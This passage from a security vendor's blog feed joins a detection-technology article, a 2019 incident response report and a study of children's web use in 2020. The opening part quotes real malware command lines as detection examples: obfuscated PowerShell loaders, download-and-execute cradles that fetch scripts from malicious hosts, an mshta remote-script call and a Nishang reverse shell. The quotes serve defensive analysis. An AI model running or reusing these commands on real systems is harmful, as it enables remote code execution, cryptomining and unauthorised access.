Adaptive Anomality Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp% \c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of actions, such as system intelligence collection.

The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt......yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Also, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (MD5: DLL-hijacking used, dll MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and notify the user. Another option is to extend the training to monitor further the way the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control training algorithm

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. This means the technology cannot detect the malware itself, just its delivery to the network, as well as the potentially dangerous actions launched by the insider, or the malicious activity of programs that have a status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to bock most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are offloaded to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

Incident Response Analyst Report 2019

Ayman Shaaban, Grigory Sablin, Kaspersky GERT — Thu, 06 Aug 2020 10:00:34 +0000

Download full report (PDF)

As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.

The insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.

Executive summary

In 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.

Analysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.

Most of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware’s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.

Verticals and industries

Adversaries used a variety of initial vectors to compromise victims’ environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.

In addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.

Although we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.

Recommendations

Based on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:

Apply complex password policies
Avoid management interfaces exposed to the internet
Only allow remote access for necessary external services with multi-factor authentication – with necessary privileges only
Regular system audits to identify vulnerable services and misconfigurations
Continually tune security tools to avoid false positives
Apply powerful audit policy with log retention period of at least six months
Monitor and investigate all alerts generated by security tools
Patch your publicly available services immediately
Enhance your email protection and employee awareness
Forbid use of PsExec to simplify security operations
Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks
Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss
Back up your data frequently and on separated infrastructure

Reasons for incident response

Significant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).

Organizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.

One of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story “Cities under ransomware siege“.

Distribution of reasons for top regions

A suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.

Distribution of reasons for industries

Although, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).

Detection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.

Initial vectors or how adversaries get in

Common initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.

By linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks.
Sometimes we act as complimentary experts for a primary incident response team from the victim’s organization and we have no information on all of their findings – hence the ‘Unknown reasons’ on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that’s not showing distrubution of 0- to 1-day vulnerabilities.

The distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization’s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.

Tools and exploits

30% of all incidents were tied to legitimate tools

In cyberattacks, adversaries use legitimate tools which can’t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.

Most legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.

Let’s weight those tools based on occurrence in incidents – we will also see tactics (MITRE ATT&CK) where they are usually applied.

Exploits

Most of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.

MS17-010 SMB service in Microsoft Windows Remote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc.	CVE-2019-0604 Microsoft Sharepoint Remote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint.	CVE-2019-19781 Citrix Application Delivery Controller & Citrix Gateway This vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure.
CVE-2019-0708 RDP service in Microsoft Windows Remote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service.	CVE-2018-7600 Drupal Remote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers.	CVE-2019-11510 Pulse Secure SSL VPN Unauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel.

Attack duration

For a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary’s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.

Rush hours or days	Average weeks	Long-lasting months or longer
This category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary’s activity.	This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week.	Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. Such attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group.
Common threat: Ransomware infection	Common threat: Financial theft	Common threat: Cyber-espionage and theft of confidential data
Common attack vector: Downloading of a malicious file by link in email Downloading of a malicious file from infected site Exploitation of vulnerabilities on network perimeter Credentials brute-force attack	Common attack vector: Downloading a malicious file by link in email Exploitation of vulnerabilities on network perimeter	Common attack vector: Exploitation of vulnerabilities on network perimeter
Attack duration (median): 1 day	Attack duration (median): 10 days	Attack duration (median): 122 days
Incident response duration: Hours to days	Incident response duration: Weeks	Incident response duration: Weeks

Operational metrics

False positives rate

False positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn’t have a specialist in threat hunting or they are managed by an external SOC that doesn’t have the full context for an event.

Age of attack

This is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.

How fast we responded

How long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.

How long response took

Distribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.

MITRE ATT&CK tactics and techniques

Conclusion

In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.

Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.

Various tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.

Kids on the Web in 2020

Anna Larkina — Wed, 03 Jun 2020 10:00:15 +0000

Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No user’s personal information is transmitted and neither is privacy compromised.

We will note two important points:

It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News were fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020 (download)

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, the adult content Windows users watched on the average more frequently during the year.

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. They less frequently visited gaming sites starting at the beginning of the year, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed a slight growth in April exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites in October. The most likely cause can be considered to be the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020 (download)

Differences across regions, countries and months

Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

We explained the decrease in the category’s share on macOS in the fall and winter with issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020 (download)

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020 (download)

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020 (download)

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

We observe a pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of Software, Audio, Video category following the macOS update.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for Internet Communications by country on the average in June 2019 through May 2020 (download)

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

Starting at the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Despite the fact that the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids spent more times playing video games on Windows than macOS desktop computers and laptops. This is due to the fact that most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users’ interest in games had grown.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by added activity in the form of school lessons, which relocated into the home due to the pandemic. Interestingly, the share of Video Games began to decline among Windows users starting in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020 (download)

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020 (download)

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020 (download)

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But, in November and December, kids’ interest in online shopping was also higher than in the other months. Which is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year’s presents.

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020 (download)

Children who used macOS spent much more hours looking at online shopping windows than their peers who used Windows.

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020 (download)

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020 (download)

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figure was recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children’s visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) fell on March, when most children were switched to distance learning.

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020 (download)

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rate was recorded in the CIS (3.17 percent) and Africa (3.96 percent).

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020 (download)

Interest in news peaked in the UK and in Italy at in February. Think of the fact that the transition to distance learning in these two countries took place in late February, whereas Germany and France went through the transition in early March, and interest in news there peaked in March, too.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

That said, macOS users showed greater interest in pornography than Windows users.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020 (download)

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020 (download)

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impede their development. Online education, and communication with friends and relatives are all made possible only through technology developed in recent decades, which have become not just a day-to-day assistant, but a lifeline in times when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behaviors. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and less frequently visit gaming sites. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation closer by going to news sites.

Today’s children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communications, but in a world where it is the only safe means of social contact, comes the realization that there may be more to it!